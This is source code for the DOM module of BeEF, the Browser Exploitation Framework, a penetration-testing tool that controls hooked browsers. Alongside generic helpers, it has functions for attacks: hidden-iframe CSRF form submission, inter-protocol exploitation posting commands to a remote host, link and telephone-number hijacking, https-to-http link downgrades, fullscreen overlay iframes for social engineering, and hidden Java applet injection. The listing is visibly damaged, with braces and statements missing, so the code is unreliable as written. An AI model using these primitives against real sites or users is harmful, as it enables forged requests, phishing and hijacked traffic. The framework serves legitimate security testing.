// Copyright (c) 2006-2025 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
* Provides functionality to manipulate the DOM.
* @namespace beef.dom
beef.dom = {
* Generates a random ID for HTML elements
* @param {String} prefix a custom prefix before the random id. defaults to "beef-"
* @return {String} generated id
generateID: function(prefix) {
return ((prefix == null) ? 'beef-' : prefix)+Math.floor(Math.random()*99999);
* Creates a new element but does not append it to the DOM.
* @param {String} type the name of the element.
* @param {Array} attributes the attributes of that element.
* @return {Array} the created element.
createElement: function(type, attributes) {
var el = document.createElement(type);
for(index in attributes) {
if(typeof attributes[index] == 'string') {
el.setAttribute(index, attributes[index]);
return el;
* Removes element from the DOM.
* @param {Object} el the target element to be removed.
removeElement: function(el) {
if (!beef.dom.isDOMElement(el))
el = document.getElementById(el);
try {
} catch (e) { }
* Tests if the object is a DOM element.
* @param {Object} the DOM element.
* @return {boolean} true if the object is a DOM element.
isDOMElement: function(obj) {
return (obj.nodeType) ? true : false;
* Creates an invisible iframe on the hook browser's page.
* @return {array} the iframe.
createInvisibleIframe: function() {
var iframe = this.createElement('iframe', {
width: '1px',
height: '1px',
style: 'visibility:hidden;'
return iframe;
* Returns the highest current z-index
* @param {Boolean} whether to return an associative array with the height AND the ID of the element
* @return {Integer} Highest z-index in the DOM
* OR
* @return {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
if (include_id) {
return highest;
} else {
return highest.height;
* Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
* is assigned to created iframe tag's src attribute resulting in GET request to that URI.
* example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
* @param {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
* @param {Hash} params: list of params that will be sent in request.
* @param {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
* @param {Function} a callback function to fire once the iFrame has loaded
* @return {Object} the inserted iFrame
createIframe: function(type, params, styles, onload) {
var css = {};
if (type == 'hidden') {
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
return iframe;
* Load the link (href value) in an overlay foreground iFrame.
* The BeEF hook continues to run in background.
* NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
* Framebusting techniques, this will not work.
persistentIframe: function(){
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = "no";
document.documentElement.style.overflow = 'hidden';
* Load a full screen div that is black, or, transparent
* @param {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
//set the shader to cover the entire page and make it visible.
dark.style.width= pageWidth;
dark.style.height= pageHeight;
} else {
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
removeStylesheets: function() {
* Create a form element with the specified parameters, appending it to the DOM if append == true
* @param {Hash} params: params to be applied to the form element
* @param {Boolean} append: automatically append the form to the body
* @return {Object} a form object
createForm: function(params, append) {
var form = $j('<form></form>').attr(params);
if (append)
return form;
loadScript: function(url) {
var s = document.createElement('script');
s.type = 'text/javascript';
s.src = url;
* Get the location of the current page.
* @return the location.
getLocation: function() {
return document.location.href;
* Get links of the current page.
* @return array of URLs.
getLinks: function() {
var linksarray = [];
var links = document.links;
for(var i = 0; i<links.length; i++) {
linksarray = linksarray.concat(links[i].href)
return linksarray
* Rewrites all links matched by selector to url, also rebinds the click method to simply return true
* @param {String} url: the url to be rewritten
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
rewriteLinks: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
$j(this).attr('href', url).click(function() { return true; });
* Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
* http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
* @param {String} url: the url to be rewritten
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
rewriteLinksClickEvents: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
$j(this).click(function() {this.href=url});
* Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
* @param {String} old_protocol: the old link protocol to be rewritten
* @param {String} new_protocol: the new link protocol to be written
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
rewriteLinksProtocol: function(old_protocol, new_protocol, selector) {
var count = 0;
var re = new RegExp(old_protocol+"://", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, new_protocol+"://")).click(function() { return true; });
return count;
* Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
* @param {String} new_number: the new link telephone number to be written
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
rewriteTelLinks: function(new_number, selector) {
var count = 0;
var re = new RegExp("tel:/?/?.*", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
return count;
* Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
* @param {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
* @return {String} the parameters as a string ready to append to applet/embed/object tags (ex.: <param name='abc' value='test' />).
parseAppletParams: function(params){
var result = '';
for (i in params){
var param = params[i];
for(key in param){
result += "<param name='" + key + "' value='" + param[key] + "' />";
return result;
* Attach an applet to the DOM, using the best approach for differet browsers (object/applet/embed).
* example usage in the code, using a JAR archive (recommended and faster):
* beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D.class', null, '', [{'param1':'1', 'param2':'2'}]);
* example usage in the code, using codebase:
* beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D', '', null, null);
* @param {String} id: reference identifier to the applet.
* @param {String} code: name of the class to be loaded. For example, beef.class.
* @param {String} codebase: the URL of the codebase (usually used when loading a single class for an unsigned applet).
* @param {String} archive: the jar that contains the code.
* @param {String} params: an array of additional params that the applet except.
attachApplet: function(id, name, code, codebase, archive, params) {
var content = null;
if (beef.browser.isIE()) {
content = "" + // the classid means 'use the latest JRE available to launch the applet'
"<object id='" + id + "'classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' " +
"height='0' width='0' name='" + name + "'> " +
"<param name='code' value='" + code + "' />";
if (codebase != null) {
content += "<param name='codebase' value='" + codebase + "' />"
if (archive != null){
content += "<param name='archive' value='" + archive + "' />";
if (params != null) {
content += beef.dom.parseAppletParams(params);
content += "</object>";
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) {
content = "" +
"<applet id='" + id + "' code='" + code + "' " +
"codebase='" + codebase + "' " +
"height='0' width='0' name='" + name + "'>";
} else {
content = "" +
"<applet id='" + id + "' code='" + code + "' " +
"archive='" + archive + "' " +
"height='0' width='0' name='" + name + "'>";
if (params != null) {
content += beef.dom.parseAppletParams(params);
content += "</applet>";
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
// if (beef.browser.isFF()) {
// if (codebase != null) {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' codebase='" + codebase + "' " +
// "height='0' width='0' name='" + name + "'>";
// } else {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' archive='" + archive + "' " +
// "height='0' width='0' name='" + name + "'>";
// }
// if (params != null) {
// content += beef.dom.parseAppletParams(params);
// }
// content += "</embed>";
// }
* Given an id, remove the applet from the DOM.
* @param {String} id: reference identifier to the applet.
detachApplet: function(id) {
$j('#' + id + '').detach();
* Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
* @param {String} action: the form action attribute, where the request will be sent.
* @param {String} method: HTTP method, usually POST.
* @param {String} enctype: form encoding type
* @param {Array} inputs: an array of inputs to be added to the form (type, name, value).
* example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
createIframeXsrfForm: function(action, method, enctype, inputs){
var iframeXsrf = beef.dom.createInvisibleIframe();
var formXsrf = document.createElement('form');
formXsrf.setAttribute('action', action);
formXsrf.setAttribute('method', method);
formXsrf.setAttribute('enctype', enctype);
var input = null;
for (i in inputs){
var attributes = inputs[i];
input = document.createElement('input');
for(key in attributes){
if (key == 'name' && attributes[key] == 'submit') {
// workaround for https://github.com/beefproject/beef/issues/1117
beef.debug("createIframeXsrfForm - warning: changed form input 'submit' to 'Submit'");
input.setAttribute('Submit', attributes[key]);
} else {
input.setAttribute(key, attributes[key]);
return iframeXsrf;
* Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
* @param {String} rhost: remote host ip/domain
* @param {String} rport: remote port
* @param {String} commands: protocol commands to be executed by the remote host:port service
createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');
input = document.createElement('textarea');
input.setAttribute('name', Math.random().toString(36).substring(5));
input.value = commands;
return iframeIpec;